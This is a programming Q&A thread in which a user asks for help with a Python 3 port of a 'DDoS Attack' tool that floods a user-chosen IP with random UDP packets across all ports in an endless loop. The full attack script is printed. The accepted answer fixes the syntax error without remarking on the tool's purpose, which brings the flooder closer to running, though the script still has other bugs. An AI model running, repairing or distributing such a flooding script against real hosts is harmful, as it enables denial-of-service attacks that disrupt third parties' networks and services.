# How can I fix this error in my python code?

Tags: python, syntax-error, python-3.8

the code is avaible on github in python 2, so i changed it a little bit but now, it says there is an syntax error and I have no idea how to fix.
CODE:

```
import sys
import os
import time
import socket
import random

#Code
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
################################################################################
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
################################################################################
os.system("clear")
os.system("figlet DDos Attack")
print("DDoS_Tool")
print("Author   : ...")
print(" ")
ip = input("IP Target : ")
port = input("Port       : ")
print(" ")

os.system("clear")
os.system("figlet Attac Starting")
os.system("figlet Attack Starting")
print ("[                    ] 0% ")
time.sleep(2)
print ("[=====               ] 25%")
time.sleep(4)
print ("[==========          ] 50%")
time.sleep(3)
print( "[===============     ] 75%")
time.sleep(4)
print ("[====================] 100%")
time.sleep(1)
sent = 0

while True:
    try:
        sock.sendto(bytes, (ip,port))
        sent = sent + 1
        port = port + 1
        print ("Sent %s packet to %s throught port:%s"%(sent,ip,port)

        if port == 65534:
            port = 1

     except:
          print("ERROR, try again")
          time.sleep(2)
          exit()
```

That's the code, and it says there is a syntax-error at:

```
if port == 65534:
```

and the ":" gets marked red.

I've no idea how to fix it.

Comment: You're missing a parenthesis at `print ("Sent %s packet to %s throught port:%s"%(sent,ip,port)`...

Comment: @JoshuaVarghese `if` is not a function call, you don't need the parentheses.

Comment: Your last `print` before the error occurs misses a parenthesis. Voting to close this as trivial...

Answer (score 0, accepted):

You are missing a parantesis close for the print statement:

```
while True:
    try:
        sock.sendto(bytes, (ip,port))
        sent = sent + 1
        port = port + 1
        print ("Sent %s packet to %s throught port:%s"%(sent,ip,port)) #here

        if port == 65534:
            port = 1

     except:
          print("ERROR, try again")
          time.sleep(2)
          exit()
```